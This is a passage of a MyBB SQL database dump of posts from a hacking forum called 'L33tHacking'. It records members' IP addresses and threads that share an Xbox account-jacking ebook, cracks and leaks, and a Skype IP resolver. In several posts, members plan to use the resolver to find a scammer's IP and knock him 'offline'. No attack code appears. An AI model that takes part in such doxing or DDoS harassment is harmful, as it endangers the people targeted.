('2546', '513', '0', '3', 'The 500 threads celebration thread :)', '0', '5', 'Timmy', '1348523800', 'Congratulations L33THacking, you guys reached 500 threads.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '69a2fe5ebc8fbda72406ed1efd703b46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2547', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1348528443', 'I am not Cinderella, but once upon a time I thought I was. When I was two years old I was brought to America by my father from the Fiji Islands after the death of my mother. I came here to live a new life, although I was only two and was not accustomed to anything else anyway. So this would be the only life I would no. I was not given two evil stepsisters, just a spoiled little stepbrother and a snobby older stepsister. I looked up to them, I don’t exactly know why, and since I didn’t know any better I became the doormat of the family. They did whatever they wanted, whenever they wanted and I just kept to myself and spent most of my time reading Goosebumps. As the years went by I became a big fan sports fan and always wished I could watch TV to watch a game sometime, since I was always told to stay away from Tvs, videogames, and computers. Since I had nothing else to do, I stayed in my room and listened to the games on the radio and at night the books kept my company. As I grew older, I became very good at reading and so I became a good student, much to the jealousy of my siblings and stepmother. My dad told me to be humble and so I did, but the family could not help but notice, as they themselves were in reality, headed nowhere. They just couldn’t handle it when I brought home the report cards to show my dad, and one day I even had the audacity to boldly go where I had never gone before. I came home, very quietly, took out a honor roll bumper sticker from my backpack, and slapped it on the bumper of the family car like I owned it. Of course, there would be dire consequences for my criminal behavior. I didn’t know what to expect and so I stayed in my room. Big mistake. One day I looked up at the ceiling and saw that she had closed the AC vent in my room! I was like 4 ft tall so I couldn’t reach it. Boy did I regret my insolent then. I guess I needed to learn my lesson.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2af921b55efddf7b0268c49033952f38', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2548', '513', '2546', '3', 'RE: The 500 threads celebration thread :)', '0', '82', 'iTzIpod', '1348529875', 'Congratulations L33tHacking. Although I usually post the Milestone threads in the Off Topic Section/Lounge.. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7904a2467679e1609fdc1018b7d55a58', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2549', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1348529957', 'http://www.deznation.ca/rsps/ Not Advertising. I just copied it from a Skype Log.. It\'s a RSPS that my friend coded.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7321ee4e9964c978c14c3d004c9d0831', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2550', '511', '2544', '5', 'RE: New forums suggestions', '0', '82', 'iTzIpod', '1348530063', 'Not related to coding or computing. But Gamers Section (I know you\'re gonna add it. :p) Movies Section? (Maybe) Innuendo (LOL :P) I don\'t know? Might suggest more in the future when I\'m in a good mood. [hr] - Rename Monetizing Techniques to Monetizing - Add a sub forum in Monetizing called Referral Links (All referral links can go there) (Registering for forums. No rival sites of course. & Adf.ly/PPC Link threads can go there. Like if someone is clicking on all of your PPC links. You can post them there.', '24.212.197.164', '416597412', '1', '0', '82', '1348531558', '1', '4c548ea148778ccc07d88e2ef52b89c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2551', '514', '0', '9', 'How to make serious money', '0', '82', 'iTzIpod', '1348531264', '[align=center][b] This eBook shows you how to make a couple $$/Day just by following this simple guide. This could easily make you $200/day if you do well. To View: [url=http://adf.ly/D9BfZ] Click[/url] To Download: [url=http://adf.ly/D9Bhl] Click[/url][/b][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1348531297', '1', '1d8dd70529a5bd0e04e9f90a1a0f8103', '0', '1348531297'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2552', '515', '0', '3', '[Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1348531835', 'Everyone please visit the link in t3h jok3r\'s signature. Please take a minute to vote for L33t Hacking. This is a huge contribution for us if you do so. As it can \"advertise\" some members. Or, use the link here: [url=http://forumtopsites.net/index.php?a=in&u=joker] Click To Vote For L33tHacking[/url]', '24.212.197.164', '416597412', '1', '0', '82', '1348958305', '1', '25ce001858aced4fc6d77e8b7afd5dc8', '0', '1348958305'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2553', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1348532158', 'Stickied. Also, click on the green one.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2989713b629b64f8f8be187ecab5bfe8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2554', '513', '2548', '3', 'RE: The 500 threads celebration thread :)', '0', '1', 't3h jok3r', '1348532218', '[quote=\'iTzIpod\' pid=\'2548\' dateline=\'1348529875\'] Congratulations L33tHacking. Although I usually post the Milestone threads in the Off Topic Section/Lounge.. :p [/quote] Small milestones are OK in the Lounge/Off topic but huge site milestones can be posted here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '806d0e440a01f828916309729576b9fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2555', '514', '2551', '9', 'RE: How to make serious money', '0', '1', 't3h jok3r', '1348532529', 'I\'m going to use this. Thanks for sharing, the best method out on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7aca1ff1007cc2b7a4e1efa0da6ab803', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2556', '511', '2544', '5', 'RE: New forums suggestions', '0', '1', 't3h jok3r', '1348532785', 'I thought about the movies section. Here is my plan on the movies section. Normal Members: Discuss Movies Upgraded Members: Movie RIPs Gamers will be added when NXK sends me the gamers group infomation. I will think of monetizing in a week or two, but not now.', '173.245.64.107', '-1376436117', '1', '0', '0', '0', '1', '4ed4d7f394291da02863881362de40d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2557', '516', '0', '29', 'RBD\'s Xbox live Jacking Method', '0', '1', 't3h jok3r', '1348533080', 'Original Post: [IMG]http://i.imgur.com/3dJNe.png[/IMG] [img]http://puu.sh/147Pf[/img] [img]http://puu.sh/147PC[/img] I know this has been leaked but it was my ebook before some idiot leaked it so here it is, I may aswell give it away. http://hidemyass.com/files/eZtd3/', '173.245.64.107', '-1376436117', '1', '0', '1', '1348542423', '1', 'bfe4a2303cc843a5738d9df26bec99bb', '0', '1348542423'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2572', '516', '2560', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '1', 't3h jok3r', '1348542449', '[quote=\'iTzIpod\' pid=\'2560\' dateline=\'1348538030\'] ... You put in vouches from different forums. Wasn\'t that forbidden or something? :o [/quote] My bad. It was leak from someone who likes leaking our content.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1ecee4ebac700cda31b7d7de2859a493', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2573', '518', '2571', '7', 'RE: 2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348542790', '[quote=\'t3h jok3r\' pid=\'2571\' dateline=\'1348542336\'] Congratz LH, thanks for contributing and to everyone who participated. I also appreciate the spammers that came here and spammed threads and their posts which helped us with more activity :D [/quote] Gee... I wonder who did that? Also, lets try to go for more members!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '368f80ad3b4619c32cbb2b0bcea47c31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2574', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '1', 't3h jok3r', '1348542990', 'True. I\'m trying my best now, I didn\'t advertise for 2 weeks. I lost a lot yesterday and lost a lot of data ever since my PC got fucked. I emptied my PP yesterday and will use the new monetizing ebook you released. [b]Edited[/b] Off Topic (AKA Lounge) reached 400 posts. Today LH has started to settle, Congratz LH.', '72.231.24.165', '1223104677', '1', '0', '1', '1348543042', '1', '6d4a89c9f708fcba61aeaed5d3db385a', '0', '1348543042'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2558', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1348537925', 'By green one, you mean the green button that says Enter and Vote? Also, remember to vote every 24 hours! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f5457d0946c2119dd726fe10c08ae67', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2559', '513', '2546', '3', 'RE: The 500 threads celebration thread :)', '0', '82', 'iTzIpod', '1348537959', 'Are you adding a Milestones Subforum? Just so we can post everything in there? :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6facbfa3828233d7cebfd199ef6af8e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2560', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '82', 'iTzIpod', '1348538030', '... You put in vouches from different forums. Wasn\'t that forbidden or something? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4bd5d4ceea44086581b1a8f1efc7982b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2561', '514', '2551', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1348538072', 'You\'re welcome. Just trying to contribute to L33t Hacking.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cf5482eb0020f48ba2fada3bce628d2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2562', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348538300', 'Hopefully it can come out sooner or later. :D Anyways, on topic, I might be making a new Gamer Userbar soon. Can you give me any ideas on what to use as a \"render/icon\"?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd26873f5312d8e435565d7258f3734a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2563', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348538400', 'Update, we are still recruiting. I suggest you try out since who knows? I might like your application and you can win access to HQ and Unique Exclusive stuff. Such as Leaks, Programs, Cracks, Methods, eBooks, and many more.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b75980994307b4a439208c214e4d0512', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2564', '517', '0', '34', 'Spiderman Signature Tutorial', '0', '82', 'iTzIpod', '1348538865', '[img]http://fc02.deviantart.net/fs16/f/2007/172/3/2/Spiderman_Signature_Tutorial_by_raime910.jpg[/img] Credits: RAIME Might try this out next time. Post results below. Enjoy Good luck.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '38c195bd85759d1ddbd9e7285ebf38a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2565', '518', '0', '7', '2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348538956', 'Congratulations L33tHacking on a total of 2,500 posts. (This is a Milestone Thread) I would personally like to thank everyone that contributed. - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bffb07f66d04971ade305a3e294fb0a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2566', '519', '0', '15', 'NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '61', 'NXK', '1348539056', 'Since everyone else is making them I thought Id make one, This probably wont last long. So get it while you can! it\'s working! Least you can do is say thank you.. That would be nice. [img]http://i.imgur.com/THfjS.png[/img] Download http://adf.ly/D9KVa Have fun :) If you want the api pm me. virus scan (you can decompile it and take the api.. I know it\'s going to happen anyways) I would virus total scan it but it would take forever since i\'m like 900th in que http://virusscan.jotti.org/en/scanresult/ec001e66c8b973327aa51f7f7ea1685fc429ba6f Credits to aeonhack and the theme maker', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1a461b354da48ffbf71b5dc8651d0278', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2567', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '82', 'iTzIpod', '1348540550', '[quote=\'NXK\' pid=\'2566\' dateline=\'1348539056\'] Since everyone else is making them I thought Id make one, This probably wont last long. So get it while you can! it\'s working! Least you can do is say thank you.. That would be nice. [img]http://i.imgur.com/THfjS.png[/img] Download http://adf.ly/D9KVa Have fun :) If you want the api pm me. virus scan (you can decompile it and take the api.. I know it\'s going to happen anyways) I would virus total scan it but it would take forever since i\'m like 900th in que http://virusscan.jotti.org/en/scanresult/ec001e66c8b973327aa51f7f7ea1685fc429ba6f Credits to aeonhack and the theme maker [/quote] Sigh... I\'m on mobile right now. So I can\'t download it. Hopefully it is still working tomorrow so I can use it to find t3h jok3r\'s IP and boot him offline. Joking. Some faggot recently scammed me $41 so I wanna give him his IP and scare him enough to learn his lesson. Because of this, I wanna learn to code... (Yes I don\'t know how..) Sad :(. Also, if you made this exclusively for L33tHacking, it would be nice to put a watermark on it. Or anything like L33thacking.net is simple and good enough. Just a suggestion. And don\'t worry. Tomorrow, I\'ll download this and scan it myself with VirusTotal for you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'accee6a873aa13d3ac2a78bb8409bcd9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2568', '519', '2567', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '61', 'NXK', '1348540721', '[quote=\'iTzIpod\' pid=\'2567\' dateline=\'1348540550\'] [quote=\'NXK\' pid=\'2566\' dateline=\'1348539056\'] Since everyone else is making them I thought Id make one, This probably wont last long. So get it while you can! it\'s working! Least you can do is say thank you.. That would be nice. [img]http://i.imgur.com/THfjS.png[/img] Download http://adf.ly/D9KVa Have fun :) If you want the api pm me. virus scan (you can decompile it and take the api.. I know it\'s going to happen anyways) I would virus total scan it but it would take forever since i\'m like 900th in que http://virusscan.jotti.org/en/scanresult/ec001e66c8b973327aa51f7f7ea1685fc429ba6f Credits to aeonhack and the theme maker [/quote] Sigh... I\'m on mobile right now. So I can\'t download it. Hopefully it is still working tomorrow so I can use it to find t3h jok3r\'s IP and boot him offline. Joking. Some faggot recently scammed me $41 so I wanna give him his IP and scare him enough to learn his lesson. Because of this, I wanna learn to code... (Yes I don\'t know how..) Sad :(. Also, if you made this exclusively for L33tHacking, it would be nice to put a watermark on it. Or anything like L33thacking.net is simple and good enough. Just a suggestion. And don\'t worry. Tomorrow, I\'ll download this and scan it myself with VirusTotal for you. [/quote] If you need him taken care of, cough cough offline. Let me know.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1f5c79a0e0a29b93b712251e66b42768', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2569', '519', '2568', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '82', 'iTzIpod', '1348541749', '[quote=\'NXK\' pid=\'2568\' dateline=\'1348540721\'] [quote=\'iTzIpod\' pid=\'2567\' dateline=\'1348540550\'] [quote=\'NXK\' pid=\'2566\' dateline=\'1348539056\'] Since everyone else is making them I thought Id make one, This probably wont last long. So get it while you can! it\'s working! Least you can do is say thank you.. That would be nice. [img]http://i.imgur.com/THfjS.png[/img] Download http://adf.ly/D9KVa Have fun :) If you want the api pm me. virus scan (you can decompile it and take the api.. I know it\'s going to happen anyways) I would virus total scan it but it would take forever since i\'m like 900th in que http://virusscan.jotti.org/en/scanresult/ec001e66c8b973327aa51f7f7ea1685fc429ba6f Credits to aeonhack and the theme maker [/quote] Sigh... I\'m on mobile right now. So I can\'t download it. Hopefully it is still working tomorrow so I can use it to find t3h jok3r\'s IP and boot him offline. Joking. Some faggot recently scammed me $41 so I wanna give him his IP and scare him enough to learn his lesson. Because of this, I wanna learn to code... (Yes I don\'t know how..) Sad :(. Also, if you made this exclusively for L33tHacking, it would be nice to put a watermark on it. Or anything like L33thacking.net is simple and good enough. Just a suggestion. And don\'t worry. Tomorrow, I\'ll download this and scan it myself with VirusTotal for you. [/quote] If you need him taken care of, cough cough offline. Let me know. [/quote] I don\'t know his IP or anything. But I got his Skype ID. Hopefully your resolver gets the right IP. I don\'t have Skype available at this moment so I don\'t know his Skype. We\'ll find out tomorrow.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4300fea3fc9b3bf61372b7c237bcb8ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2570', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '1', 't3h jok3r', '1348542283', 'You got a bad ass doxer here ;) Send me the IP too if you find it. I also like Ipods idea and I will test this tomorrow.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '47016a371c79aba39045b3f6da7ce91d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2571', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '1', 't3h jok3r', '1348542336', 'Congratz LH, thanks for contributing and to everyone who participated. I also appreciate the spammers that came here and spammed threads and their posts which helped us with more activity :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6fd7d5834d1b39297b6006a24f5e161d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2575', '513', '2559', '3', 'RE: The 500 threads celebration thread :)', '0', '1', 't3h jok3r', '1348543357', '[quote=\'iTzIpod\' pid=\'2559\' dateline=\'1348537959\'] Are you adding a Milestones Subforum? Just so we can post everything in there? :p [/quote] We don\'t really have much milestones at the moment so it would be inactive.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '19e14d0765997c1815c8125a49e143c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2576', '518', '2574', '7', 'RE: 2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348543604', '[quote=\'t3h jok3r\' pid=\'2574\' dateline=\'1348542990\'] True. I\'m trying my best now, I didn\'t advertise for 2 weeks. I lost a lot yesterday and lost a lot of data ever since my PC got fucked. I emptied my PP yesterday and will use the new monetizing ebook you released. [b]Edited[/b] Off Topic (AKA Lounge) reached 400 posts. Today LH has started to settle, Congratz LH. [/quote] Someday, we would have to make up for the downtime.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68ffaf6ccb161af003159f12939863b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2577', '518', '2576', '7', 'RE: 2,500 Total Forum Posts', '0', '1', 't3h jok3r', '1348544001', '[quote=\'iTzIpod\' pid=\'2576\' dateline=\'1348543604\'] [quote=\'t3h jok3r\' pid=\'2574\' dateline=\'1348542990\'] True. I\'m trying my best now, I didn\'t advertise for 2 weeks. I lost a lot yesterday and lost a lot of data ever since my PC got fucked. I emptied my PP yesterday and will use the new monetizing ebook you released. [b]Edited[/b] Off Topic (AKA Lounge) reached 400 posts. Today LH has started to settle, Congratz LH. [/quote] Someday, we would have to make up for the downtime. [/quote] True and the day we get the double of expect, that day will be the day LH will would start dominating computing forums by MyBB. If members like Baws, JakeUS, Timmy, HoverCatz, Thunder, duhuh etc come back to LH or become a bit more active. EX: If they make 2 posts a day and if they make 4 posts now or 2 posts and 1 thread then if we start this process at the starting of October then by November I can bet that LH would have around 1K threads and 4-5K posts.', '72.231.24.165', '1223104677', '1', '0', '1', '1348544187', '1', '0869d84e7922dff2dce58429750d6e66', '0', '1348544187'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2578', '439', '2563', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1348544675', '[quote=\'iTzIpod\' pid=\'2563\' dateline=\'1348538400\'] Update, we are still recruiting. I suggest you try out since who knows? I might like your application and you can win access to HQ and Unique Exclusive stuff. Such as Leaks, Programs, Cracks, Methods, eBooks, and many more. [/quote] Did you decline or approve timmy?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cd5aec8c8fc3822edb93e9e278e8fecf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2579', '515', '2558', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1348544709', '[quote=\'iTzIpod\' pid=\'2558\' dateline=\'1348537925\'] By green one, you mean the green button that says Enter and Vote? Also, remember to vote every 24 hours! :D [/quote] Yes that\'s correct. It doesn\'t matter if you vote once or multiple times because it only counts one vote.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0608a237ad1fe4687b64e70ae5d8cbd0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2580', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '1', 't3h jok3r', '1348544823', 'Just waiting for NXK and for the icon the best bet is to ask NXK.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7ba52f032d2534a02bf09d9c6ed2d6c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2581', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348573449', 'Approved. Welcome to Unique.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3a9ca181d977a8f0de203835c625c57b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2582', '511', '2544', '5', 'RE: New forums suggestions', '0', '82', 'iTzIpod', '1348573568', 'Alright. Movie Rips seems nice.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dc6024646958e8791e2ec8a89ddad07e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2583', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '82', 'iTzIpod', '1348574133', '[spoiler=Virus Scan (VirusTotal)] 